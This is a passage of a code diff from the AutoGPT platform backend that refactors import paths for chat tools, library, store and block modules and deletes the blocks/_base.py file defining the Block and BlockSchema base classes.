-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool
+from backend.api.features.chat.tools.models import (
    DocSearchResult,
    DocSearchResultsResponse,
    ErrorResponse,
    NoResultsResponse,
    ToolResponseBase,
 )
-from backend.data.db_accessors import search
+from backend.api.features.store.hybrid_search import unified_hybrid_search

 logger = logging.getLogger(__name__)

@@ -117,7 +117,7 @@ class SearchDocsTool(BaseTool):

        try:
            # Search using hybrid search for DOCUMENTATION content type only
-            results, total = await search().unified_hybrid_search(
+            results, total = await unified_hybrid_search(
                query=query,
                content_types=[ContentType.DOCUMENTATION],
                page=1,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
@@ -3,8 +3,9 @@
 import logging
 from typing import Any

+from backend.api.features.library import db as library_db
 from backend.api.features.library import model as library_model
-from backend.data.db_accessors import library_db, store_db
+from backend.api.features.store import db as store_db
 from backend.data.graph import GraphModel
 from backend.data.model import (
    Credentials,
@@ -37,14 +38,13 @@ async def fetch_graph_from_store_slug(
    Raises:
        DatabaseError: If there's a database error during lookup.
    """
-    sdb = store_db()
    try:
-        store_agent = await sdb.get_store_agent_details(username, agent_name)
+        store_agent = await store_db.get_store_agent_details(username, agent_name)
    except NotFoundError:
        return None, None

    # Get the graph from store listing version
-    graph = await sdb.get_available_graph(
+    graph = await store_db.get_available_graph(
        store_agent.store_listing_version_id, hide_nodes=False
    )
    return graph, store_agent
@@ -209,13 +209,13 @@ async def get_or_create_library_agent(
    Returns:
        LibraryAgent instance
    """
-    existing = await library_db().get_library_agent_by_graph_id(
+    existing = await library_db.get_library_agent_by_graph_id(
        graph_id=graph.id, user_id=user_id
    )
    if existing:
        return existing

-    library_agents = await library_db().create_library_agent(
+    library_agents = await library_db.create_library_agent(
        graph=graph,
        user_id=user_id,
        create_library_agents_for_sub_graphs=False,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/workspace_files.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/workspace_files.py
@@ -6,8 +6,8 @@ from typing import Any, Optional

 from pydantic import BaseModel

-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import workspace_db
+from backend.api.features.chat.model import ChatSession
+from backend.data.workspace import get_or_create_workspace
 from backend.util.settings import Config
 from backend.util.virus_scanner import scan_content_safe
 from backend.util.workspace import WorkspaceManager
@@ -146,7 +146,7 @@ class ListWorkspaceFilesTool(BaseTool):
        include_all_sessions: bool = kwargs.get("include_all_sessions", False)

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -280,7 +280,7 @@ class ReadWorkspaceFileTool(BaseTool):
            )

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -478,7 +478,7 @@ class WriteWorkspaceFileTool(BaseTool):
            # Virus scan
            await scan_content_safe(content, filename=filename)

-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

@@ -577,7 +577,7 @@ class DeleteWorkspaceFileTool(BaseTool):
            )

        try:
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)
            # Pass session_id for session-scoped file access
            manager = WorkspaceManager(user_id, workspace.id, session_id)

--- a/autogpt_platform/backend/backend/api/features/chat/tracking.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tracking.py
--- a/autogpt_platform/backend/backend/api/features/library/db.py
+++ b/autogpt_platform/backend/backend/api/features/library/db.py
@@ -12,11 +12,12 @@ import backend.api.features.store.image_gen as store_image_gen
 import backend.api.features.store.media as store_media
 import backend.data.graph as graph_db
 import backend.data.integrations as integrations_db
+from backend.data.block import BlockInput
 from backend.data.db import transaction
 from backend.data.execution import get_graph_execution
 from backend.data.graph import GraphSettings
 from backend.data.includes import AGENT_PRESET_INCLUDE, library_agent_include
-from backend.data.model import CredentialsMetaInput, GraphInput
+from backend.data.model import CredentialsMetaInput
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.integrations.webhooks.graph_lifecycle_hooks import (
    on_graph_activate,
@@ -1129,7 +1130,7 @@ async def create_preset_from_graph_execution(
 async def update_preset(
    user_id: str,
    preset_id: str,
-    inputs: Optional[GraphInput] = None,
+    inputs: Optional[BlockInput] = None,
    credentials: Optional[dict[str, CredentialsMetaInput]] = None,
    name: Optional[str] = None,
    description: Optional[str] = None,
--- a/autogpt_platform/backend/backend/api/features/library/model.py
+++ b/autogpt_platform/backend/backend/api/features/library/model.py
@@ -6,12 +6,9 @@ import prisma.enums
 import prisma.models
 import pydantic

+from backend.data.block import BlockInput
 from backend.data.graph import GraphModel, GraphSettings, GraphTriggerInfo
-from backend.data.model import (
-    CredentialsMetaInput,
-    GraphInput,
-    is_credentials_field_name,
-)
+from backend.data.model import CredentialsMetaInput, is_credentials_field_name
 from backend.util.json import loads as json_loads
 from backend.util.models import Pagination

@@ -326,7 +323,7 @@ class LibraryAgentPresetCreatable(pydantic.BaseModel):
    graph_id: str
    graph_version: int

-    inputs: GraphInput
+    inputs: BlockInput
    credentials: dict[str, CredentialsMetaInput]

    name: str
@@ -355,7 +352,7 @@ class LibraryAgentPresetUpdatable(pydantic.BaseModel):
    Request model used when updating a preset for a library agent.
    """

-    inputs: Optional[GraphInput] = None
+    inputs: Optional[BlockInput] = None
    credentials: Optional[dict[str, CredentialsMetaInput]] = None

    name: Optional[str] = None
@@ -398,7 +395,7 @@ class LibraryAgentPreset(LibraryAgentPresetCreatable):
                "Webhook must be included in AgentPreset query when webhookId is set"
            )

-        input_data: GraphInput = {}
+        input_data: BlockInput = {}
        input_credentials: dict[str, CredentialsMetaInput] = {}

        for preset_input in preset.InputPresets:
--- a/autogpt_platform/backend/backend/api/features/otto/service.py
+++ b/autogpt_platform/backend/backend/api/features/otto/service.py
@@ -5,8 +5,8 @@ from typing import Optional
 import aiohttp
 from fastapi import HTTPException

-from backend.blocks import get_block
 from backend.data import graph as graph_db
+from backend.data.block import get_block
 from backend.util.settings import Settings

 from .models import ApiResponse, ChatRequest, GraphData
--- a/autogpt_platform/backend/backend/api/features/store/content_handlers.py
+++ b/autogpt_platform/backend/backend/api/features/store/content_handlers.py
@@ -152,7 +152,7 @@ class BlockHandler(ContentHandler):

    async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
        """Fetch blocks without embeddings."""
-        from backend.blocks import get_blocks
+        from backend.data.block import get_blocks

        # Get all available blocks
        all_blocks = get_blocks()
@@ -249,7 +249,7 @@ class BlockHandler(ContentHandler):

    async def get_stats(self) -> dict[str, int]:
        """Get statistics about block embedding coverage."""
-        from backend.blocks import get_blocks
+        from backend.data.block import get_blocks

        all_blocks = get_blocks()

--- a/autogpt_platform/backend/backend/api/features/store/content_handlers_test.py
+++ b/autogpt_platform/backend/backend/api/features/store/content_handlers_test.py
@@ -93,7 +93,7 @@ async def test_block_handler_get_missing_items(mocker):
    mock_existing = []

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -135,7 +135,7 @@ async def test_block_handler_get_stats(mocker):
    mock_embedded = [{"count": 2}]

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -327,7 +327,7 @@ async def test_block_handler_handles_missing_attributes():
    mock_blocks = {"block-minimal": mock_block_class}

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -360,7 +360,7 @@ async def test_block_handler_skips_failed_blocks():
    mock_blocks = {"good-block": good_block, "bad-block": bad_block}

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
--- a/autogpt_platform/backend/backend/api/features/store/embeddings.py
+++ b/autogpt_platform/backend/backend/api/features/store/embeddings.py
@@ -662,7 +662,7 @@ async def cleanup_orphaned_embeddings() -> dict[str, Any]:
                )
                current_ids = {row["id"] for row in valid_agents}
            elif content_type == ContentType.BLOCK:
-                from backend.blocks import get_blocks
+                from backend.data.block import get_blocks

                current_ids = set(get_blocks().keys())
            elif content_type == ContentType.DOCUMENTATION:
--- a/autogpt_platform/backend/backend/api/features/store/image_gen.py
+++ b/autogpt_platform/backend/backend/api/features/store/image_gen.py
@@ -7,6 +7,15 @@ from replicate.client import Client as ReplicateClient
 from replicate.exceptions import ReplicateError
 from replicate.helpers import FileOutput

+from backend.blocks.ideogram import (
+    AspectRatio,
+    ColorPalettePreset,
+    IdeogramModelBlock,
+    IdeogramModelName,
+    MagicPromptOption,
+    StyleType,
+    UpscaleOption,
+)
 from backend.data.graph import GraphBaseMeta
 from backend.data.model import CredentialsMetaInput, ProviderName
 from backend.integrations.credentials_store import ideogram_credentials
@@ -41,16 +50,6 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
    if not ideogram_credentials.api_key:
        raise ValueError("Missing Ideogram API key")

-    from backend.blocks.ideogram import (
-        AspectRatio,
-        ColorPalettePreset,
-        IdeogramModelBlock,
-        IdeogramModelName,
-        MagicPromptOption,
-        StyleType,
-        UpscaleOption,
-    )
-
    name = graph.name
    description = f"{name} ({graph.description})" if graph.description else name

--- a/autogpt_platform/backend/backend/api/features/v1.py
+++ b/autogpt_platform/backend/backend/api/features/v1.py
@@ -40,11 +40,10 @@ from backend.api.model import (
    UpdateTimezoneRequest,
    UploadFileResponse,
 )
-from backend.blocks import get_block, get_blocks
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
 from backend.data.auth import api_key as api_key_db
-from backend.data.block import BlockInput, CompletedBlockOutput
+from backend.data.block import BlockInput, CompletedBlockOutput, get_block, get_blocks
 from backend.data.credit import (
    AutoTopUpConfig,
    RefundRequest,
--- a/autogpt_platform/backend/backend/api/rest_api.py
+++ b/autogpt_platform/backend/backend/api/rest_api.py
@@ -40,11 +40,11 @@ import backend.data.user
 import backend.integrations.webhooks.utils
 import backend.util.service
 import backend.util.settings
-from backend.blocks.llm import DEFAULT_LLM_MODEL
-from backend.copilot.completion_consumer import (
+from backend.api.features.chat.completion_consumer import (
    start_completion_consumer,
    stop_completion_consumer,
 )
+from backend.blocks.llm import DEFAULT_LLM_MODEL
 from backend.data.model import Credentials
 from backend.integrations.providers import ProviderName
 from backend.monitoring.instrumentation import instrument_fastapi
--- a/autogpt_platform/backend/backend/app.py
+++ b/autogpt_platform/backend/backend/app.py
@@ -38,9 +38,7 @@ def main(**kwargs):

    from backend.api.rest_api import AgentServer
    from backend.api.ws_api import WebsocketServer
-    from backend.copilot.executor.manager import CoPilotExecutor
-    from backend.data.db_manager import DatabaseManager
-    from backend.executor import ExecutionManager, Scheduler
+    from backend.executor import DatabaseManager, ExecutionManager, Scheduler
    from backend.notifications import NotificationManager

    run_processes(
@@ -50,7 +48,6 @@ def main(**kwargs):
        WebsocketServer(),
        AgentServer(),
        ExecutionManager(),
-        CoPilotExecutor(),
        **kwargs,
    )

--- a/autogpt_platform/backend/backend/blocks/__init__.py
+++ b/autogpt_platform/backend/backend/blocks/__init__.py
@@ -3,19 +3,22 @@ import logging
 import os
 import re
 from pathlib import Path
-from typing import Sequence, Type, TypeVar
+from typing import TYPE_CHECKING, TypeVar

-from backend.blocks._base import AnyBlockSchema, BlockType
 from backend.util.cache import cached

 logger = logging.getLogger(__name__)

+
+if TYPE_CHECKING:
+    from backend.data.block import Block
+
 T = TypeVar("T")


@cached(ttl_seconds=3600)
-def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
-    from backend.blocks._base import Block
+def load_all_blocks() -> dict[str, type["Block"]]:
+    from backend.data.block import Block
    from backend.util.settings import Config

    # Check if example blocks should be loaded from settings
@@ -47,8 +50,8 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
        importlib.import_module(f".{module}", package=__name__)

    # Load all Block instances from the available modules
-    available_blocks: dict[str, type["AnyBlockSchema"]] = {}
-    for block_cls in _all_subclasses(Block):
+    available_blocks: dict[str, type["Block"]] = {}
+    for block_cls in all_subclasses(Block):
        class_name = block_cls.__name__

        if class_name.endswith("Base"):
@@ -61,7 +64,7 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
                "please name the class with 'Base' at the end"
            )

-        block = block_cls()  # pyright: ignore[reportAbstractUsage]
+        block = block_cls.create()

        if not isinstance(block.id, str) or len(block.id) != 36:
            raise ValueError(
@@ -102,7 +105,7 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
        available_blocks[block.id] = block_cls

    # Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
-    from ._utils import is_block_auth_configured
+    from backend.data.block import is_block_auth_configured

    filtered_blocks = {}
    for block_id, block_cls in available_blocks.items():
@@ -112,48 +115,11 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
    return filtered_blocks


-def _all_subclasses(cls: type[T]) -> list[type[T]]:
+__all__ = ["load_all_blocks"]
+
+
+def all_subclasses(cls: type[T]) -> list[type[T]]:
    subclasses = cls.__subclasses__()
    for subclass in subclasses:
-        subclasses += _all_subclasses(subclass)
+        subclasses += all_subclasses(subclass)
    return subclasses
-
-
-# ============== Block access helper functions ============== #
-
-
-def get_blocks() -> dict[str, Type["AnyBlockSchema"]]:
-    return load_all_blocks()
-
-
-# Note on the return type annotation: https://github.com/microsoft/pyright/issues/10281
-def get_block(block_id: str) -> "AnyBlockSchema | None":
-    cls = get_blocks().get(block_id)
-    return cls() if cls else None
-
-
-@cached(ttl_seconds=3600)
-def get_webhook_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type in (BlockType.WEBHOOK, BlockType.WEBHOOK_MANUAL)
-    ]
-
-
-@cached(ttl_seconds=3600)
-def get_io_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type in (BlockType.INPUT, BlockType.OUTPUT)
-    ]
-
-
-@cached(ttl_seconds=3600)
-def get_human_in_the_loop_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type == BlockType.HUMAN_IN_THE_LOOP
-    ]
--- a/autogpt_platform/backend/backend/blocks/_base.py
+++ b/autogpt_platform/backend/backend/blocks/_base.py
@@ -1,739 +0,0 @@
-import inspect
-import logging
-from abc import ABC, abstractmethod
-from enum import Enum
-from typing import (
-    TYPE_CHECKING,
-    Any,
-    Callable,
-    ClassVar,
-    Generic,
-    Optional,
-    Type,
-    TypeAlias,
-    TypeVar,
-    cast,
-    get_origin,
-)
-
-import jsonref
-import jsonschema
-from pydantic import BaseModel
-
-from backend.data.block import BlockInput, BlockOutput, BlockOutputEntry
-from backend.data.model import (
-    Credentials,
-    CredentialsFieldInfo,
-    CredentialsMetaInput,
-    SchemaField,
-    is_credentials_field_name,
-)
-from backend.integrations.providers import ProviderName
-from backend.util import json
-from backend.util.exceptions import (
-    BlockError,
-    BlockExecutionError,
-    BlockInputError,
-    BlockOutputError,
-    BlockUnknownError,
-)
-from backend.util.settings import Config
-
-logger = logging.getLogger(__name__)
-
-if TYPE_CHECKING:
-    from backend.data.execution import ExecutionContext
-    from backend.data.model import ContributorDetails, NodeExecutionStats
-
-    from ..data.graph import Link
-
-app_config = Config()
-
-
-BlockTestOutput = BlockOutputEntry | tuple[str, Callable[[Any], bool]]
-
-
-class BlockType(Enum):
-    STANDARD = "Standard"
-    INPUT = "Input"
-    OUTPUT = "Output"
-    NOTE = "Note"
-    WEBHOOK = "Webhook"
-    WEBHOOK_MANUAL = "Webhook (manual)"
-    AGENT = "Agent"
-    AI = "AI"
-    AYRSHARE = "Ayrshare"
-    HUMAN_IN_THE_LOOP = "Human In The Loop"
-
-
-class BlockCategory(Enum):
-    AI = "Block that leverages AI to perform a task."
-    SOCIAL = "Block that interacts with social media platforms."
-    TEXT = "Block that processes text data."
-    SEARCH = "Block that searches or extracts information from the internet."
-    BASIC = "Block that performs basic operations."
-    INPUT = "Block that interacts with input of the graph."
-    OUTPUT = "Block that interacts with output of the graph."
-    LOGIC = "Programming logic to control the flow of your agent"
-    COMMUNICATION = "Block that interacts with communication platforms."
-    DEVELOPER_TOOLS = "Developer tools such as GitHub blocks."
-    DATA = "Block that interacts with structured data."
-    HARDWARE = "Block that interacts with hardware."
-    AGENT = "Block that interacts with other agents."
-    CRM = "Block that interacts with CRM services."
-    SAFETY = (
-        "Block that provides AI safety mechanisms such as detecting harmful content"
-    )
-    PRODUCTIVITY = "Block that helps with productivity"
-    ISSUE_TRACKING = "Block that helps with issue tracking"
-    MULTIMEDIA = "Block that interacts with multimedia content"
-    MARKETING = "Block that helps with marketing"
-
-    def dict(self) -> dict[str, str]:
-        return {"category": self.name, "description": self.value}
-
-
-class BlockCostType(str, Enum):
-    RUN = "run"  # cost X credits per run
-    BYTE = "byte"  # cost X credits per byte
-    SECOND = "second"  # cost X credits per second
-
-
-class BlockCost(BaseModel):
-    cost_amount: int
-    cost_filter: BlockInput
-    cost_type: BlockCostType
-
-    def __init__(
-        self,
-        cost_amount: int,
-        cost_type: BlockCostType = BlockCostType.RUN,
-        cost_filter: Optional[BlockInput] = None,
-        **data: Any,
-    ) -> None:
-        super().__init__(
-            cost_amount=cost_amount,
-            cost_filter=cost_filter or {},
-            cost_type=cost_type,
-            **data,
-        )
-
-
-class BlockInfo(BaseModel):
-    id: str
-    name: str
-    inputSchema: dict[str, Any]
-    outputSchema: dict[str, Any]
-    costs: list[BlockCost]
-    description: str
-    categories: list[dict[str, str]]
-    contributors: list[dict[str, Any]]
-    staticOutput: bool
-    uiType: str
-
-
-class BlockSchema(BaseModel):
-    cached_jsonschema: ClassVar[dict[str, Any]]
-
-    @classmethod
-    def jsonschema(cls) -> dict[str, Any]:
-        if cls.cached_jsonschema:
-            return cls.cached_jsonschema
-
-        model = jsonref.replace_refs(cls.model_json_schema(), merge_props=True)
-
-        def ref_to_dict(obj):
-            if isinstance(obj, dict):
-                # OpenAPI <3.1 does not support sibling fields that has a $ref key
-                # So sometimes, the schema has an "allOf"/"anyOf"/"oneOf" with 1 item.
-                keys = {"allOf", "anyOf", "oneOf"}
-                one_key = next((k for k in keys if k in obj and len(obj[k]) == 1), None)
-                if one_key:
-                    obj.update(obj[one_key][0])
-
-                return {
-                    key: ref_to_dict(value)
-                    for key, value in obj.items()
-                    if not key.startswith("$") and key != one_key
-                }
-            elif isinstance(obj, list):
-                return [ref_to_dict(item) for item in obj]
-
-            return obj
-
-        cls.cached_jsonschema = cast(dict[str, Any], ref_to_dict(model))
-
-        return cls.cached_jsonschema
-
-    @classmethod
-    def validate_data(cls, data: BlockInput) -> str | None:
-        return json.validate_with_jsonschema(
-            schema=cls.jsonschema(),
-            data={k: v for k, v in data.items() if v is not None},
-        )
-
-    @classmethod
-    def get_mismatch_error(cls, data: BlockInput) -> str | None:
-        return cls.validate_data(data)
-
-    @classmethod
-    def get_field_schema(cls, field_name: str) -> dict[str, Any]:
-        model_schema = cls.jsonschema().get("properties", {})
-        if not model_schema:
-            raise ValueError(f"Invalid model schema {cls}")
-
-        property_schema = model_schema.get(field_name)
-        if not property_schema:
-            raise ValueError(f"Invalid property name {field_name}")
-
-        return property_schema
-
-    @classmethod
-    def validate_field(cls, field_name: str, data: BlockInput) -> str | None:
-        """
-        Validate the data against a specific property (one of the input/output name).
-        Returns the validation error message if the data does not match the schema.
-        """
-        try:
-            property_schema = cls.get_field_schema(field_name)
-            jsonschema.validate(json.to_dict(data), property_schema)
-            return None
-        except jsonschema.ValidationError as e:
-            return str(e)
-
-    @classmethod
-    def get_fields(cls) -> set[str]:
-        return set(cls.model_fields.keys())
-
-    @classmethod
-    def get_required_fields(cls) -> set[str]:
-        return {
-            field
-            for field, field_info in cls.model_fields.items()
-            if field_info.is_required()
-        }
-
-    @classmethod
-    def __pydantic_init_subclass__(cls, **kwargs):
-        """Validates the schema definition. Rules:
-        - Fields with annotation `CredentialsMetaInput` MUST be
-          named `credentials` or `*_credentials`
-        - Fields named `credentials` or `*_credentials` MUST be
-          of type `CredentialsMetaInput`
-        """
-        super().__pydantic_init_subclass__(**kwargs)
-
-        # Reset cached JSON schema to prevent inheriting it from parent class
-        cls.cached_jsonschema = {}
-
-        credentials_fields = cls.get_credentials_fields()
-
-        for field_name in cls.get_fields():
-            if is_credentials_field_name(field_name):
-                if field_name not in credentials_fields:
-                    raise TypeError(
-                        f"Credentials field '{field_name}' on {cls.__qualname__} "
-                        f"is not of type {CredentialsMetaInput.__name__}"
-                    )
-
-                CredentialsMetaInput.validate_credentials_field_schema(
-                    cls.get_field_schema(field_name), field_name
-                )
-
-            elif field_name in credentials_fields:
-                raise KeyError(
-                    f"Credentials field '{field_name}' on {cls.__qualname__} "
-                    "has invalid name: must be 'credentials' or *_credentials"
-                )
-
-    @classmethod
-    def get_credentials_fields(cls) -> dict[str, type[CredentialsMetaInput]]:
-        return {
-            field_name: info.annotation
-            for field_name, info in cls.model_fields.items()
-            if (
-                inspect.isclass(info.annotation)
-                and issubclass(
-                    get_origin(info.annotation) or info.annotation,
-                    CredentialsMetaInput,
-                )
-            )
-        }
-
-    @classmethod
-    def get_auto_credentials_fields(cls) -> dict[str, dict[str, Any]]:
-        """
-        Get fields that have auto_credentials metadata (e.g., GoogleDriveFileInput).
-
-        Returns a dict mapping kwarg_name -> {field_name, auto_credentials_config}
-
-        Raises:
-            ValueError: If multiple fields have the same kwarg_name, as this would
-                cause silent overwriting and only the last field would be processed.
-        """
-        result: dict[str, dict[str, Any]] = {}
-        schema = cls.jsonschema()
-        properties = schema.get("properties", {})
-
-        for field_name, field_schema in properties.items():
-            auto_creds = field_schema.get("auto_credentials")
-            if auto_creds:
-                kwarg_name = auto_creds.get("kwarg_name", "credentials")
-                if kwarg_name in result:
-                    raise ValueError(
-                        f"Duplicate auto_credentials kwarg_name '{kwarg_name}' "
-                        f"in fields '{result[kwarg_name]['field_name']}' and "
-                        f"'{field_name}' on {cls.__qualname__}"
-                    )
-                result[kwarg_name] = {
-                    "field_name": field_name,
-                    "config": auto_creds,
-                }
-        return result
-
-    @classmethod
-    def get_credentials_fields_info(cls) -> dict[str, CredentialsFieldInfo]:
-        result = {}
-
-        # Regular credentials fields
-        for field_name in cls.get_credentials_fields().keys():
-            result[field_name] = CredentialsFieldInfo.model_validate(
-                cls.get_field_schema(field_name), by_alias=True
-            )
-
-        # Auto-generated credentials fields (from GoogleDriveFileInput etc.)
-        for kwarg_name, info in cls.get_auto_credentials_fields().items():
-            config = info["config"]
-            # Build a schema-like dict that CredentialsFieldInfo can parse
-            auto_schema = {
-                "credentials_provider": [config.get("provider", "google")],
-                "credentials_types": [config.get("type", "oauth2")],
-                "credentials_scopes": config.get("scopes"),
-            }
-            result[kwarg_name] = CredentialsFieldInfo.model_validate(
-                auto_schema, by_alias=True
-            )
-
-        return result
-
-    @classmethod
-    def get_input_defaults(cls, data: BlockInput) -> BlockInput:
-        return data  # Return as is, by default.
-
-    @classmethod
-    def get_missing_links(cls, data: BlockInput, links: list["Link"]) -> set[str]:
-        input_fields_from_nodes = {link.sink_name for link in links}
-        return input_fields_from_nodes - set(data)
-
-    @classmethod
-    def get_missing_input(cls, data: BlockInput) -> set[str]:
-        return cls.get_required_fields() - set(data)
-
-
-class BlockSchemaInput(BlockSchema):
-    """
-    Base schema class for block inputs.
-    All block input schemas should extend this class for consistency.
-    """
-
-    pass
-
-
-class BlockSchemaOutput(BlockSchema):
-    """
-    Base schema class for block outputs that includes a standard error field.
-    All block output schemas should extend this class to ensure consistent error handling.
-    """
-
-    error: str = SchemaField(
-        description="Error message if the operation failed", default=""
-    )
-
-
-BlockSchemaInputType = TypeVar("BlockSchemaInputType", bound=BlockSchemaInput)
-BlockSchemaOutputType = TypeVar("BlockSchemaOutputType", bound=BlockSchemaOutput)
-
-
-class EmptyInputSchema(BlockSchemaInput):
-    pass
-
-
-class EmptyOutputSchema(BlockSchemaOutput):
-    pass
-
-
-# For backward compatibility - will be deprecated
-EmptySchema = EmptyOutputSchema
-
-
-# --8<-- [start:BlockWebhookConfig]
-class BlockManualWebhookConfig(BaseModel):
-    """
-    Configuration model for webhook-triggered blocks on which
-    the user has to manually set up the webhook at the provider.
-    """
-
-    provider: ProviderName
-    """The service provider that the webhook connects to"""
-
-    webhook_type: str
-    """
-    Identifier for the webhook type. E.g. GitHub has repo and organization level hooks.
-
-    Only for use in the corresponding `WebhooksManager`.
-    """
-
-    event_filter_input: str = ""
-    """
-    Name of the block's event filter input.
-    Leave empty if the corresponding webhook doesn't have distinct event/payload types.
-    """
-
-    event_format: str = "{event}"
-    """
-    Template string for the event(s) that a block instance subscribes to.
-    Applied individually to each event selected in the event filter input.
-
-    Example: `"pull_request.{event}"` -> `"pull_request.opened"`
-    """
-
-
-class BlockWebhookConfig(BlockManualWebhookConfig):
-    """
-    Configuration model for webhook-triggered blocks for which
-    the webhook can be automatically set up through the provider's API.
-    """
-
-    resource_format: str
-    """
-    Template string for the resource that a block instance subscribes to.
-    Fields will be filled from the block's inputs (except `payload`).
-
-    Example: `f"{repo}/pull_requests"` (note: not how it's actually implemented)
-
-    Only for use in the corresponding `WebhooksManager`.
-    """
-    # --8<-- [end:BlockWebhookConfig]
-
-
-class Block(ABC, Generic[BlockSchemaInputType, BlockSchemaOutputType]):
-    def __init__(
-        self,
-        id: str = "",
-        description: str = "",
-        contributors: list["ContributorDetails"] = [],
-        categories: set[BlockCategory] | None = None,
-        input_schema: Type[BlockSchemaInputType] = EmptyInputSchema,
-        output_schema: Type[BlockSchemaOutputType] = EmptyOutputSchema,
-        test_input: BlockInput | list[BlockInput] | None = None,
-        test_output: BlockTestOutput | list[BlockTestOutput] | None = None,
-        test_mock: dict[str, Any] | None = None,
-        test_credentials: Optional[Credentials | dict[str, Credentials]] = None,
-        disabled: bool = False,
-        static_output: bool = False,
-        block_type: BlockType = BlockType.STANDARD,
-        webhook_config: Optional[BlockWebhookConfig | BlockManualWebhookConfig] = None,
-        is_sensitive_action: bool = False,
-    ):
-        """
-        Initialize the block with the given schema.
-
-        Args:
-            id: The unique identifier for the block, this value will be persisted in the
-                DB. So it should be a unique and constant across the application run.
-                Use the UUID format for the ID.
-            description: The description of the block, explaining what the block does.
-            contributors: The list of contributors who contributed to the block.
-            input_schema: The schema, defined as a Pydantic model, for the input data.
-            output_schema: The schema, defined as a Pydantic model, for the output data.
-            test_input: The list or single sample input data for the block, for testing.
-            test_output: The list or single expected output if the test_input is run.
-            test_mock: function names on the block implementation to mock on test run.
-            disabled: If the block is disabled, it will not be available for execution.
-            static_output: Whether the output links of the block are static by default.
-        """
-        from backend.data.model import NodeExecutionStats
-
-        self.id = id
-        self.input_schema = input_schema
-        self.output_schema = output_schema
-        self.test_input = test_input
-        self.test_output = test_output
-        self.test_mock = test_mock
-        self.test_credentials = test_credentials
-        self.description = description
-        self.categories = categories or set()
-        self.contributors = contributors or set()
-        self.disabled = disabled
-        self.static_output = static_output
-        self.block_type = block_type
-        self.webhook_config = webhook_config
-        self.is_sensitive_action = is_sensitive_action
-        self.execution_stats: "NodeExecutionStats" = NodeExecutionStats()
-
-        if self.webhook_config:
-            if isinstance(self.webhook_config, BlockWebhookConfig):
-                # Enforce presence of credentials field on auto-setup webhook blocks
-                if not (cred_fields := self.input_schema.get_credentials_fields()):
-                    raise TypeError(
-                        "credentials field is required on auto-setup webhook blocks"
-                    )
-                # Disallow multiple credentials inputs on webhook blocks
-                elif len(cred_fields) > 1:
-                    raise ValueError(
-                        "Multiple credentials inputs not supported on webhook blocks"
-                    )
-
-                self.block_type = BlockType.WEBHOOK
-            else:
-                self.block_type = BlockType.WEBHOOK_MANUAL
-
-            # Enforce shape of webhook event filter, if present
-            if self.webhook_config.event_filter_input:
-                event_filter_field = self.input_schema.model_fields[
-                    self.webhook_config.event_filter_input
-                ]
-                if not (
-                    isinstance(event_filter_field.annotation, type)
-                    and issubclass(event_filter_field.annotation, BaseModel)
-                    and all(
-                        field.annotation is bool
-                        for field in event_filter_field.annotation.model_fields.values()
-                    )
-                ):
-                    raise NotImplementedError(
-                        f"{self.name} has an invalid webhook event selector: "
-                        "field must be a BaseModel and all its fields must be boolean"
-                    )
-
-            # Enforce presence of 'payload' input
-            if "payload" not in self.input_schema.model_fields:
-                raise TypeError(
-                    f"{self.name} is webhook-triggered but has no 'payload' input"
-                )
-
-            # Disable webhook-triggered block if webhook functionality not available
-            if not app_config.platform_base_url:
-                self.disabled = True
-
-    @abstractmethod
-    async def run(self, input_data: BlockSchemaInputType, **kwargs) -> BlockOutput:
-        """
-        Run the block with the given input data.
-        Args:
-            input_data: The input data with the structure of input_schema.
-
-        Kwargs: Currently 14/02/2025 these include
-            graph_id: The ID of the graph.
-            node_id: The ID of the node.
-            graph_exec_id: The ID of the graph execution.
-            node_exec_id: The ID of the node execution.
-            user_id: The ID of the user.
-
-        Returns:
-            A Generator that yields (output_name, output_data).
-            output_name: One of the output name defined in Block's output_schema.
-            output_data: The data for the output_name, matching the defined schema.
-        """
-        # --- satisfy the type checker, never executed -------------
-        if False:  # noqa: SIM115
-            yield "name", "value"  # pyright: ignore[reportMissingYield]
-        raise NotImplementedError(f"{self.name} does not implement the run method.")
-
-    async def run_once(
